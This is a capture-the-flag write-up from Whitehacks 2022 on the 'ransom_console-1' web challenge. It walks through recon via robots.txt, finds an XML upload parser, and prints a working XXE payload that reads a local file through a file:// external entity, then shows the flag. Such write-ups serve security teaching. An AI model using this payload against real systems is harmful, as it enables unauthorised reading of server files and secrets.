Hacking
Writeups
Web
ransom_console-1

ransom_console-1

Description

CTF: Whitehacks 2022

Author: Louis (l0j0)

Difficulty: Medium

Space Department has found a web server where Shadowcore, a group of ransomware operators providing Ransomware-as-a-Service in Planet X26-10EG, monitors their C2 server from.

Challenge Access:
http://challenges1.whitehacks.xyz:5001 (opens in a new tab) http://challenges2.whitehacks.xyz:5001 (opens in a new tab)

Let's retrieve their SSH key from the home directory at /home/r4s0m_4d1m1n/flag.txt so that we can access their C2 Server directly.

Solution

Pwned by @fishjojo1 (opens in a new tab)

Recon!

Upon visiting the site provided, we are greeted by

sign in page

Username and password fields...look interesting, but after playing around with a little, I didn't really get anywhere.

The right answer here would be to go thru a basic checklist of sorts, looking at common directories like .git, robots.txt etc etc.

However, if you had taken a look at ransom_console-2 — part 2 of the challenge, you would have spotted this.

Shadowcore discovered we stole their keys due to strong monitoring system on their upload page and discover what we were up to. They have hidden the key somewhere else. Fortunately, for us, we have managed to extract a snippet of their source code for their new dashboard they created as we were kicked out of their server. Let's hack them again, this time putting an end to all their operations.

“their upload page” — hmm...perhaps we should check /uploads?

Alternatively,

Looking at robots.txt

User-agent: *
Disallow: /upload /dashboard

Lets check /upload and /dashboard out, upload looks interesting

Playing around

upload page

What we find in /upload

Had no clue what config file meant, but when in doubt, upload something random, lets try an image

We are redirected to

Internal Server Error

The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

Not very useful...but taking a look at the url we're redirected to —http://challenges1.whitehacks.xyz:5001/xml-parse (opens in a new tab)

This hopefully tells us, it's some sort of xml parser. Let's pass in some sample xml then

Grabbed some sample xml from —> https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms762271(v=vs.85) (opens in a new tab)

upload page but with stuff

Sweet! We see that we get the parsed xml.

The exploit

XML has it's share of problems, here's one — XXE

Here's (opens in a new tab) a nice read

XML supports processing of entities, variables if you will, which will allow us to perform the funny.

Let's take a look at the exploit:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/r4s0m_4d1m1n/flag.txt"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Here, we know that the flag is stored in /home/r4s0m_4d1m1n/flag.txt, now how to read it?

<!ENTITY xxe SYSTEM "file:///home/r4s0m_4d1m1n/flag.txt"> declares an external entity(read: variable), with the SYSTEM keyword, and the file: schema. In essence, it declares a varibale xxe, with the value of /home/r4s0m_4d1m1n/flag.txt. And we get the flag!

WH2022{SSH_KeY5_ST0L3n_8y_U5}

Recommended reading:
https://portswigger.net/web-security/xxe/xml-entities (opens in a new tab)

PyRunnerX marks Louis's treasure